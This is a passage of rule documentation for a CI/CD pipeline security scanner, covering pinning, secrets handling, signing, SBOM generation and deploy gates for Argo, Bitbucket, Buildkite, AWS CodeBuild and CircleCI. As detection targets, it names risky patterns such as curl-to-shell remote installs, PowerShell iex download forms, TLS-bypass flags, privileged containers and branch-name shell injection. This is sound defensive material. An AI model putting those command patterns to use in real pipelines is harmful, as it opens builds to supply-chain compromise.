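A sketch of the secretKeyRef shape (Secret name and key hypothetical):

```yaml
container:
  image: alpine:3.18
  env:
    - name: API_TOKEN
      valueFrom:
        secretKeyRef:
          name: build-secrets    # Kubernetes Secret, not a literal in the manifest
          key: api-token
```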
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ARGO-006 in the Argo Workflows provider.
ARGO-007: Argo workflow has no activeDeadlineSeconds LOW
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. Applies to Workflow, CronWorkflow, WorkflowTemplate, and ClusterWorkflowTemplate. The field can sit at the workflow level or on individual templates.
Recommendation. Set spec.activeDeadlineSeconds (or spec.workflowSpec.activeDeadlineSeconds on a CronWorkflow) so a hung step can't pin the workflow controller's reconcile cycle indefinitely. Pick a value generous enough for the slowest legitimate run (e.g. 3600 for a typical pipeline, 21600 for ML training). Per-template activeDeadlineSeconds is also accepted as evidence of intent.
Source: ARGO-007 in the Argo Workflows provider.
ARGO-008: Argo script source pipes remote install or disables TLS HIGH 🔧 fix
Evidences: SC-8 Transmission Confidentiality and Integrity, SI-7 Software, Firmware, and Information Integrity, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Walks script.source and joined container.args text with the cross-provider CURL_PIPE_RE and TLS_BYPASS_RE regexes.
Recommendation. Replace curl ... | sh with a download-then-verify-then-execute pattern. Drop TLS-bypass flags (curl -k, git config http.sslverify false); install the missing CA into the template image instead. Both forms let an attacker controlling DNS / a transparent proxy substitute the script the workflow runs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ARGO-008 in the Argo Workflows provider.
ARGO-009: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Detection mirrors GHA-006 / TKN-009 / BK-009: the shared signing-token catalog (cosign, sigstore, slsa-github-generator, slsa-framework, notation-sign) is searched across every string in each Argo document. Fires only on artifact-producing Workflows / WorkflowTemplates (those that invoke docker build / docker push / kaniko / helm upgrade / aws s3 sync / etc.) so lint-only Workflows don't trip it.
Recommendation. Add a cosign step to the Workflow. The most common shape is a final sign template that runs cosign sign --yes <repo>@sha256:<digest> after the build. Sign by digest, not tag, so a re-pushed tag can't bypass the signature.
Source: ARGO-009 in the Argo Workflows provider.
ARGO-010: No SBOM generated for build artifacts MEDIUM
Evidences: CM-8 System Component Inventory, SR-4 Provenance.
How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer did this CVE ship? for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool. Fires only on artifact-producing Workflows.
Recommendation. Add an SBOM-generation template. syft <artifact> -o cyclonedx-json > /tmp/sbom.json runs in any standard container; cyclonedx-cli and cdxgen are alternative producers. Persist the SBOM as an output artifact so downstream templates and consumers can read it.
Source: ARGO-010 in the Argo Workflows provider.
ARGO-011: No SLSA provenance attestation produced MEDIUM
Evidences: CM-2 Baseline Configuration, SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, witness run, attest-build-provenance).
Recommendation. Add a cosign attest --predicate slsa.json --type slsaprovenance <ref> step after the build template, or use witness run to record the build environment. Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.
Source: ARGO-011 in the Argo Workflows provider.
ARGO-012: No vulnerability scanning step MEDIUM
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation.
How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers does this artifact ship a known CVE? rather than can we verify what it is?. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, osv-scanner, govulncheck, anchore, codeql-action, semgrep, bandit, checkov, tfsec. Walks every Argo document and passes if any document includes a scanner reference.
Recommendation. Add a vulnerability scanner template. trivy fs /workdir for source / filesystem; trivy image <ref> for container images. grype, snyk, npm audit, pip-audit are alternatives. Fail the template on findings above a chosen severity so a regression blocks the merge instead of shipping.
Source: ARGO-012 in the Argo Workflows provider.
ARGO-013: Argo workflow does not opt out of SA token automount MEDIUM
Evidences: AC-6 Least Privilege, IA-5 Authenticator Management.
How this is detected. Companion to ARGO-003 (default ServiceAccount). The default SA only matters when its token is mounted; an explicit automountServiceAccountToken: false removes the token from the pod regardless of which SA the pod is bound to. Detection: workflow passes when the spec sets it to false AND every template either inherits that or sets its own automountServiceAccountToken: false. A template with it explicitly true (or unset against an unset spec-level value) is the failing shape.
Recommendation. Set spec.automountServiceAccountToken: false on the Workflow / WorkflowTemplate, or per-template (templates[].automountServiceAccountToken: false) on any template that doesn't need to talk to the Kubernetes API. An explicit false keeps a compromised step from using the workflow's SA token to escalate inside the cluster. Even when the SA itself is hardened (ARGO-003), a token automounted into every pod widens the leak surface.
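A sketch of the passing shape, with a single API-facing template opting back in (template names and images hypothetical):

```yaml
spec:
  automountServiceAccountToken: false    # spec-level opt-out inherited by templates
  templates:
    - name: build
      container:
        image: alpine:3.18
    - name: gitops-apply
      automountServiceAccountToken: true # only this template talks to the API
      container:
        image: bitnami/kubectl:1.28      # placeholder image
```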
Known false positives.
- Templates that genuinely need to call the Kubernetes API (GitOps pull, kubectl apply from inside the workflow). Set automountServiceAccountToken: true on that template specifically and bind it to a least-privilege SA; the rule then fires only on the broad spec-level absence, which is the actual gap.
Source: ARGO-013 in the Argo Workflows provider.
BB-001: pipe: action not pinned to exact version HIGH 🔧 fix
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Bitbucket pipes are docker-image references. Major-only (:1) or missing tags let Atlassian/the publisher swap the image contents. Full semver or sha256 digest is required.
Recommendation. Pin every pipe: to a full semver tag (e.g. atlassian/aws-s3-deploy:1.4.0) or to an immutable SHA. Floating majors like :1 can roll to new code silently.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-001 in the Bitbucket provider.
BB-002: Script injection via attacker-controllable context HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SI-7 Software, Firmware, and Information Integrity.
How this is detected. $BITBUCKET_BRANCH, $BITBUCKET_TAG, and $BITBUCKET_PR_* are populated from SCM event metadata the attacker controls. Interpolating them unquoted into a shell command lets a crafted branch or tag name execute inline.
Recommendation. Always double-quote interpolations of ref-derived variables ("$BITBUCKET_BRANCH"). Avoid passing them to eval, sh -c, or unquoted command arguments.
Source: BB-002 in the Bitbucket provider.
BB-003: Variables contain literal secret values CRITICAL
Evidences: IA-5 Authenticator Management.
How this is detected. Scans definitions.variables and each step's variables: for entries whose KEY looks credential-shaped and whose VALUE is a literal string. AWS access keys are detected by value shape regardless of key name.
Recommendation. Store credentials as Repository / Deployment Variables in Bitbucket's Pipelines settings with the 'Secured' flag, and reference them by name. Prefer short-lived OIDC tokens for cloud access.
Source: BB-003 in the Bitbucket provider.
BB-004: Deploy step missing deployment: environment gate MEDIUM
Evidences: AC-3 Access Enforcement, SA-10 Developer Configuration Management.
How this is detected. A step whose name or invoked pipe matches deploy / release / publish / promote should declare a deployment: field so Bitbucket enforces deployment-scoped variables, approvals, and history.
Recommendation. Add deployment: production (or staging / test) to the step. Configure the matching environment in the repo's Deployments settings with required reviewers and secured variables.
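A minimal gated step (branch and script names hypothetical):

```yaml
pipelines:
  branches:
    main:
      - step:
          name: Deploy to production
          deployment: production   # deployment-scoped variables and approvals apply
          script:
            - ./deploy.sh
```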
Source: BB-004 in the Bitbucket provider.
BB-005: Step has no max-time, unbounded build MEDIUM 🔧 fix
Evidences: CM-6 Configuration Settings.
How this is detected. Without max-time, the step runs until Bitbucket's 120-minute global default kills it. Explicit per-step timeouts cap blast radius and cost.
Recommendation. Add max-time: <minutes> to each step, sized to the 95th percentile of historical runtime plus margin. Bounded runs limit the blast radius of a compromised build and prevent runaway minute consumption.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-005 in the Bitbucket provider.
BB-029: image: (step or service) not pinned by sha256 digest HIGH
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. BB-001 / BB-009 only inspect pipe: references inside script: lists. Step image: directives and definitions.services.<name>.image: define the runtime container the build executes inside (and the auxiliary containers the step talks to over the loopback network). Both surfaces ship code into the build context: a compromised service image (the postgres container, the selenium-grid container, …) can exfiltrate every secret the step touches just as easily as the step image itself. This rule reuses _primitives.image_pinning.classify so the floating-tag semantics match GHA-001 / GL-001 / JF-009 / ADO-009 / CC-003 / K8S-001.
Recommendation. Resolve every image: reference to its current digest (docker buildx imagetools inspect <ref> or crane digest <ref>) and pin via image: name@sha256:<digest>. Floating tags (:latest, :3, no tag) silently swap the runtime image: the build's reproducibility invariant breaks, and a registry-side compromise lands inside CI without any local change.
Known false positives.
- Bitbucket-vendored helper images (the atlassian/ namespace) are still treated as third-party; the registry can move the tag. Pin them too rather than suppressing the rule globally.
Source: BB-029 in the Bitbucket provider.
BK-001: Buildkite plugin not pinned to an exact version HIGH
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Buildkite resolves plugin refs at agent boot. foo#v1.2.3 locks the version; foo#main / foo does not. Detection fires on bare names, branch keywords, and partial-semver pins (v4, v4.13).
Recommendation. Pin every plugin reference to an exact tag (docker-compose#v4.13.0) or a 40-char commit SHA. Bare references (docker-compose), branch refs (#main / #master), and major-only floats (#v4) resolve to whatever is current at agent start time, which lets a compromised plugin release execute inside the pipeline.
Source: BK-001 in the Buildkite provider.
BK-002: Literal secret value in pipeline env block CRITICAL 🔧 fix
Evidences: IA-5 Authenticator Management, SC-28 Protection of Information at Rest.
How this is detected. Detection fires on values that look like AWS access keys, GitHub PATs, OpenAI keys, JWTs, or generic high-entropy tokens, plus on env-var names that imply a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) when the value is a non-empty literal rather than an interpolation ($SECRET_FROM_AGENT_HOOK).
Recommendation. Move the value out of the pipeline file. Use Buildkite's agent secrets hooks (secrets/ directory or BUILDKITE_PLUGIN_AWS_SSM_*), the aws-ssm / vault-secrets plugins, or the BUILDKITE_PIPELINE_DEFAULT_BRANCH env var pulled from a secret manager. The pipeline.yml is committed to the repo and visible to anyone with read access.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-002 in the Buildkite provider.
BK-003: Untrusted Buildkite variable interpolated in command HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Buildkite passes branch / tag / message metadata as environment variables. Putting them inside $(...) or shelling out with the value unquoted is a classic command-injection vector. The detection fires on the unquoted interpolation form and on use inside eval / $(...).
Recommendation. Don't interpolate $BUILDKITE_BRANCH, $BUILDKITE_TAG, $BUILDKITE_MESSAGE, $BUILDKITE_PULL_REQUEST_*, or $BUILDKITE_BUILD_AUTHOR* directly into shell commands. These come from the pull request / branch and are attacker-controllable. Quote them and assign to a local variable first (branch="$BUILDKITE_BRANCH"; ./script --branch "$branch"), or pass them as arguments to a script you own.
Source: BK-003 in the Buildkite provider.
BK-004: Remote script piped into shell interpreter HIGH 🔧 fix
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. The detection fires on curl|bash, curl|sh, wget|bash, iex (iwr ...), and the corresponding Invoke-WebRequest|Invoke-Expression PowerShell forms.
Recommendation. Download the installer to disk, verify a checksum or signature, then execute it (curl -fsSLO <url>; sha256sum -c install.sh.sha256; bash install.sh). curl ... | sh lets the remote host change what runs in your pipeline at any time, and any TLS / DNS error during download silently feeds a partial script to the shell.
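A sketch of the download-then-verify-then-execute shape inside a Buildkite step (URL and checksum are placeholders):

```yaml
steps:
  - label: "install tool"
    command: |
      curl -fsSLO https://example.com/install.sh             # placeholder URL
      echo "<expected-sha256>  install.sh" | sha256sum -c -  # fails closed on mismatch
      bash install.sh
```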
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-004 in the Buildkite provider.
BK-005: Container started with --privileged or host-bind escalation HIGH 🔧 fix
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. Detection fires on --privileged, --cap-add=SYS_ADMIN, --pid=host / --ipc=host / --userns=host, and explicit mounts of the host Docker socket (/var/run/docker.sock).
Recommendation. Drop --privileged, --cap-add=SYS_ADMIN, --pid=host, and -v /var/run/docker.sock from container invocations. If the workload needs Docker-in-Docker, use a build-specific rootless option (buildx, kaniko, buildah --isolation=chroot) instead of opening the host kernel and the agent's Docker socket to the build script.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-005 in the Buildkite provider.
BK-006: Step has no timeout_in_minutes LOW
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. Buildkite has no implicit timeout; agents will wait forever. Set timeout_in_minutes: per step. The pipeline-level default counts: a global steps: block with timeout_in_minutes: is fine, since Buildkite copies it to each step.
Recommendation. Set timeout_in_minutes: on every command step. A compromised dependency or a hung test can otherwise hold an agent indefinitely, blocking parallel pipelines and running up self-hosted-runner cost. Pick a value generous enough for the slowest legitimate run (e.g. 30 for a typical build, 90 for an integration suite).
Known false positives.
- Steps that genuinely need >24h (rare; database migrations, ML training jobs): set timeout_in_minutes: 1440 explicitly so the generous bound is visibly intentional rather than an accidental absence.
Source: BK-006 in the Buildkite provider.
BK-007: Deploy step not gated by a manual block / input MEDIUM
Evidences: AC-3 Access Enforcement, SA-10 Developer Configuration Management.
How this is detected. A step is treated as a deploy when its label, key, or any command line contains a deploy keyword (deploy, ship, release, promote, apply, rollout, terraform apply, kubectl apply, helm upgrade, aws ecs update-service). The check passes when at least one preceding step in the same pipeline file is a block: or input: flow-control step.
Recommendation. Insert a - block: "Deploy?" (or - input: step) in front of every deploy step. Buildkite waits for a human to click Unblock before the gated steps run, which prevents an unreviewed merge from auto-deploying to production. Combine with branches: main so the gate only appears on release branches.
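A minimal gated pipeline (labels hypothetical); the block step combined with branches: main matches the recommendation above:

```yaml
steps:
  - label: build
    command: ./build.sh
  - block: "Deploy?"        # a human must unblock before anything below runs
    branches: main
  - label: deploy
    command: ./deploy.sh
    branches: main          # also the shape BK-013 looks for
```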
Known false positives.
- Pipelines where the deploy gate lives in a triggered pipeline rather than the local file: the local pipeline looks ungated even though the actual deploy is gated downstream. Add a no-op block: to silence.
Source: BK-007 in the Buildkite provider.
BK-008: TLS verification disabled in step command MEDIUM 🔧 fix
Evidences: SC-8 Transmission Confidentiality and Integrity, SC-13 Cryptographic Protection.
How this is detected. Detection fires on the canonical bypass flags across curl, wget, git, npm, pip, gcloud, and openssl. The check is deliberately conservative: partial-word matches (--insecure-protocols) are excluded.
Recommendation. Drop curl -k / --insecure, wget --no-check-certificate, git -c http.sslVerify=false, and pip install --trusted-host. If a CA isn't trusted, install it into the agent's trust store (update-ca-certificates) rather than disabling validation pipeline-wide. A compromised intermediate that strips TLS gets a free hand with every fetch the step performs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-008 in the Buildkite provider.
BK-009: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Unsigned artifacts can't be verified downstream, so a tampered build is indistinguishable from a legitimate one. The check recognises cosign, sigstore, slsa-github-generator, slsa-framework, and notation-sign as signing tools, matching the shared signing-token catalog used by the other CI packs.
Recommendation. Add a signing step: install cosign once (brew install cosign in the agent image, or a cosign-install plugin) and call cosign sign --yes <ref> after the build. For container images pushed to ECR / GCR / GHCR, the same call signs by digest. Publish the signature alongside the artifact and verify it at consumption time.
Source: BK-009 in the Buildkite provider.
BK-010: No SBOM generated for build artifacts MEDIUM
Evidences: CM-8 System Component Inventory, SR-4 Provenance.
How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer did this CVE ship? for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool.
Recommendation. Add an SBOM-generation step. syft <artifact> -o cyclonedx-json > sbom.json runs in any standard agent image; cyclonedx-cli and cdxgen are alternative producers. Upload the SBOM via buildkite-agent artifact upload so downstream consumers (and incident-response tooling) can match deployed artifacts to the components they were built from.
Source: BK-010 in the Buildkite provider.
BK-011: No SLSA provenance attestation produced MEDIUM
Evidences: CM-2 Baseline Configuration, SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Without the attestation, a leaked signing key is enough to forge a trusted artifact; with both in place, a forger must also compromise the build environment. You need both for the SLSA L3 non-falsifiability guarantee. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, attest-build-provenance).
Recommendation. Run cosign attest --predicate slsa.json (or the SLSA-framework generator from a build-time step) after the build completes. The predicate records the build inputs and the agent that produced the artifact. Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.
Source: BK-011 in the Buildkite provider.
BK-012: No vulnerability scanning step MEDIUM
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation.
How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers does this artifact ship a known CVE? rather than can we verify what it is?. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, anchore, dependency-check, checkov, semgrep.
Recommendation. Add a vulnerability scanner: trivy fs . for source / filesystem, trivy image <ref> for container images, grype and snyk for either. Add npm audit / pip-audit for language-specific dep audits. Fail the step on findings above a chosen severity so a regression blocks the merge instead of shipping.
Source: BK-012 in the Buildkite provider.
BK-013: Deploy step has no branches: filter MEDIUM
Evidences: AC-3 Access Enforcement.
How this is detected. A step is treated as a deploy when its label, key, or any command line contains a deploy keyword (deploy, ship-it, release, promote, rollout, helm upgrade, kubectl apply, terraform apply, aws ecs update-service, aws lambda update-function-code, gcloud run deploy). The check passes when the step declares branches: with at least one literal branch name (a wildcard like "*" is treated as an explicit opt-out, not a passing filter, and still trips). The pipeline-level default also counts: top-level steps: with branches: propagates.
Recommendation. Add branches: "main release/*" (or your release branch glob) to every deploy step. Buildkite skips the step on any other branch, which prevents a feature-branch PR from accidentally promoting code to production. Combine with BK-007's manual block: so a release branch plus a human approval is the path to deploy.
Known false positives.
- Trunk-based teams that branch-protect
mainand treat every merge as a deploy candidate may not usebranches:. Addbranches: mainto make the policy explicit, or ignore BK-013 in.pipeline-check-ignore.ymlwith a scope ofmain-only repos.
Source: BK-013 in the Buildkite provider.
CA-001: CodeArtifact domain not encrypted with customer KMS CMK MEDIUM
Evidences: SC-12 Cryptographic Key Establishment and Management, SC-13 Cryptographic Protection.
How this is detected. AWS-owned encryption (the default alias/aws/codeartifact key) keeps the key policy under AWS's control, not yours. That's fine for confidentiality but means cross-account auditability of every Decrypt event lives with AWS, and you can't revoke or scope key access without recreating the domain. A customer-managed CMK puts both controls back in your hands.
Recommendation. Recreate the CodeArtifact domain with an encryption-key argument pointing at a customer-managed CMK. Domain encryption is set at creation and cannot be changed after.
Source: CA-001 in the AWS provider.
CA-002: CodeArtifact repository has a public external connection HIGH
Evidences: SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. An external connection to public:npmjs / public:pypi / public:nuget / public:maven-central fetches packages from the public registry on first resolution. A typo-squat (request vs requests) or a compromised upstream lands in the cache the first time anyone names it; every subsequent build pulls the cached substitute. A pull-through cache governed by an explicit allow-list closes the same risk shape.
Recommendation. Route public package consumption through a pull-through cache repository governed by an allow-list of package names, and point build-time repos at that cache rather than directly at public:npmjs/public:pypi. Unscoped public upstreams expose builds to dependency-confusion and typosquatting attacks.
Source: CA-002 in the AWS provider.
CA-003: CodeArtifact domain policy allows cross-account wildcard CRITICAL
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection.
How this is detected. A wildcard-principal Allow on a CodeArtifact domain lets any AWS account reach the domain's permissions surface. The exact damage depends on the action set, but at minimum it lets external accounts read package names and versions, which is enough for typosquat-against-private-package attacks. An aws:PrincipalOrgID condition scopes access to your organization without enumerating accounts.
Recommendation. Remove Allow statements with Principal: '*' from every CodeArtifact domain permissions policy, or restrict them with an aws:PrincipalOrgID condition so only accounts in your org can consume packages from the domain.
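A sketch of the scoped policy (org ID and action set are placeholders; CodeArtifact takes the JSON equivalent via put-domain-permissions-policy):

```yaml
# Shown as YAML for readability; apply as JSON.
Version: "2012-10-17"
Statement:
  - Effect: Allow
    Principal: "*"
    Action:
      - codeartifact:GetAuthorizationToken
      - codeartifact:ReadFromRepository
    Resource: "*"
    Condition:
      StringEquals:
        aws:PrincipalOrgID: o-exampleorgid   # placeholder org ID
```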
Source: CA-003 in the AWS provider.
CA-004: CodeArtifact repo policy grants codeartifact:* with Resource '*' HIGH
Evidences: AC-6 Least Privilege.
How this is detected. codeartifact:* on Resource: '*' collapses the entire repository's authority into one grant: the holder can read, write, delete, dispose, and re-publish every package. Even for a service principal that nominally only consumes packages, the grant lets a compromise of that consumer rewrite every dependency the team relies on.
Recommendation. Scope Allow statements to specific codeartifact: actions (e.g. codeartifact:ReadFromRepository) and to specific package-group ARNs. Wildcard action + wildcard resource is the classic over-broad grant that lets a consumer also publish.
Source: CA-004 in the AWS provider.
CB-001: Secrets in plaintext environment variables CRITICAL
Evidences: IA-5 Authenticator Management.
How this is detected. Flags a plaintext env var when either (a) its name matches a secret-like pattern (PASSWORD, TOKEN, API_KEY, ...) or (b) its value matches a known credential shape (AKIA/ASIA access keys, GitHub tokens, Slack xox* tokens, JWTs). Plaintext values are visible in the AWS console, CloudTrail, and build logs to anyone with read access.
Recommendation. Move secrets to AWS Secrets Manager or SSM Parameter Store and reference them using type SECRETS_MANAGER or PARAMETER_STORE in the CodeBuild environment variable configuration.
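A CloudFormation-style sketch (secret name hypothetical); the build resolves the value at runtime and the console only ever shows the reference:

```yaml
Environment:
  EnvironmentVariables:
    - Name: DB_PASSWORD
      Type: SECRETS_MANAGER
      Value: prod/db:password   # secret-id:json-key, resolved at build time
```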
Source: CB-001 in the AWS provider.
CB-002: Privileged mode enabled HIGH
Evidences: CM-6 Configuration Settings, CM-7 Least Functionality.
How this is detected. Privileged mode grants the build container root access to the host's Docker daemon. A compromised build can escape the container or tamper with the host. Only flip this on for real Docker-in-Docker workloads and keep the buildspec under branch-protected review.
Recommendation. Disable privileged mode unless the project explicitly requires Docker-in-Docker builds. If required, ensure the buildspec is tightly controlled, peer-reviewed, and sourced from a trusted repository with branch protection.
Source: CB-002 in the AWS provider.
CB-003: Build logging not enabled MEDIUM
Evidences: AU-2 Event Logging, AU-12 Audit Record Generation.
How this is detected. A CodeBuild project with neither CloudWatch Logs nor S3 logging enabled leaves no durable record of what the build did. The CodeBuild console shows the last execution's logs for a short retention window, but anything older, and any automated review of historical activity during incident response, is gone.
Recommendation. Enable CloudWatch Logs or S3 logging in the CodeBuild project configuration to maintain a durable audit trail of all build activity.
Source: CB-003 in the AWS provider.
CB-004: No build timeout configured LOW
Evidences: CM-6 Configuration Settings.
How this is detected. A CodeBuild project at AWS's 480-minute maximum is rarely deliberate. Without a tighter ceiling, a runaway test loop, a fork-PR cryptomining payload, or a build that hangs on stdin keeps the build host (and its IAM role) live for the full eight hours, racking up cost and extending the compromise window.
Recommendation. Set a build timeout appropriate for your expected build duration (typically 15–60 minutes) to limit the blast radius of a runaway or abused build.
Source: CB-004 in the AWS provider.
CB-005: Outdated managed build image MEDIUM
Evidences: CM-2 Baseline Configuration, RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation.
How this is detected. Only AWS-managed aws/codebuild/standard:N.0 images are version-checked. Custom or third-party images pass here; CB-009 handles the separate concern of tag vs digest pinning for custom images.
Recommendation. Update the CodeBuild environment image to aws/codebuild/standard:7.0 or later to ensure the build environment receives the latest security patches.
Known false positives.
- One version behind the current aws/codebuild/standard is a hygiene warning, not a production issue, and defaults to MEDIUM confidence. The rule emits HIGH only when the project is two or more versions behind. Custom or third-party images are not version-checked here; CB-009 handles tag-vs-digest pinning for those.
Source: CB-005 in the AWS provider.
CB-006: CodeBuild source auth uses long-lived token HIGH
Evidences: IA-5 Authenticator Management.
How this is detected. OAUTH / PERSONAL_ACCESS_TOKEN / BASIC_AUTH source credentials are stored long-lived on the account and used by every CodeBuild project that points at the SCM provider. Rotating the upstream PAT requires manual re-credentialing here too. CodeConnections (CodeStar) is the AWS-managed alternative with token refresh and revocation.
Recommendation. Switch to an AWS CodeConnections (CodeStar) connection and reference it from the source configuration. Delete any stored source credentials of type OAUTH, PERSONAL_ACCESS_TOKEN, or BASIC_AUTH via delete_source_credentials.
Source: CB-006 in the AWS provider.
CB-007: CodeBuild webhook has no filter group MEDIUM
Evidences: CM-6 Configuration Settings, CM-7 Least Functionality.
How this is detected. A CodeBuild webhook with no filter groups fires on every push and every PR from any actor, including fork PRs from outside the org. Anyone able to open a PR triggers the build with whatever IAM authority the project's role carries. Filter groups (branch + actor + event type) are the gate.
Recommendation. Define filter groups restricting triggers to specific branches, actors, and event types.
Source: CB-007 in the AWS provider.
CC-001: Orb not pinned to exact semver HIGH 🔧 fix
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Orb references in the orbs: block must include an @x.y.z suffix to lock a specific version. References without @, with @volatile, or with only a major (@1) or major.minor (@5.1) version float and can silently pull in malicious updates.
Recommendation. Pin every orb to an exact semver version (circleci/node@5.1.0). Floating references like @volatile, @1, or bare names without @ resolve to whatever is latest at build time, allowing a compromised orb update to execute in the pipeline.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-001 in the CircleCI provider.
CC-002: Script injection via untrusted environment variable HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SA-15 Development Process, Standards, and Tools.
How this is detected. CircleCI exposes environment variables like $CIRCLE_BRANCH, $CIRCLE_TAG, and $CIRCLE_PR_NUMBER that are controlled by the event source (branch name, tag, PR). Interpolating them unquoted into run: commands allows shell injection via specially crafted branch or tag names.
Recommendation. Do not interpolate attacker-controllable environment variables (CIRCLE_BRANCH, CIRCLE_TAG, CIRCLE_PR_NUMBER, etc.) directly into shell commands. Pass them through an intermediate variable and quote them, or use CircleCI pipeline parameters instead.
Source: CC-002 in the CircleCI provider.
CC-003: Docker image not pinned by digest HIGH
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Docker images referenced in docker: blocks under jobs or executors must include an @sha256:... digest suffix. Tag-only references (:latest, :18) are mutable and can be replaced at any time by whoever controls the upstream registry.
Recommendation. Pin every Docker image to its sha256 digest: cimg/node:18@sha256:abc123.... Tags like :latest or :18 are mutable; a registry compromise or upstream push silently replaces the image content.
Source: CC-003 in the CircleCI provider.
CC-004: Secret-like environment variable not managed via context MEDIUM
Evidences: IA-5 Authenticator Management.
How this is detected. Jobs that declare environment variables with secret-looking names (containing PASSWORD, TOKEN, SECRET, or API_KEY) in inline environment: blocks bypass CircleCI's contexts; security-group restrictions, OIDC claims, and audit logging are only enforced when secrets live in contexts.
Recommendation. Move secret-like variables (PASSWORD, TOKEN, SECRET, API_KEY) into a CircleCI context and reference the context in the workflow job configuration. Contexts support security groups and audit logging that inline environment: blocks lack.
Source: CC-004 in the CircleCI provider.
CC-005: AWS auth uses long-lived access keys in environment block MEDIUM 🔧 fix
Evidences: IA-5 Authenticator Management.
How this is detected. Long-lived AWS access keys declared directly in a job's environment: block are visible to anyone who can read the config. They cannot be rotated automatically and remain valid until manually revoked. OIDC-based federation yields short-lived credentials per build.
Recommendation. Remove AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from the job environment: block. Use CircleCI's OIDC token with aws-cli/setup orb's role-based auth, or store credentials in a context with security group restrictions.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-005 in the CircleCI provider.
CC-006: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Unsigned artifacts cannot be verified downstream, so a tampered build is indistinguishable from a legitimate one. The check recognises cosign, sigstore, slsa-framework, and notation-sign as signing tools.
Recommendation. Add a signing step to the pipeline, e.g. install cosign and run cosign sign, or use the sigstore CLI. Publish the signature alongside the artifact and verify it at consumption time.
Source: CC-006 in the CircleCI provider.
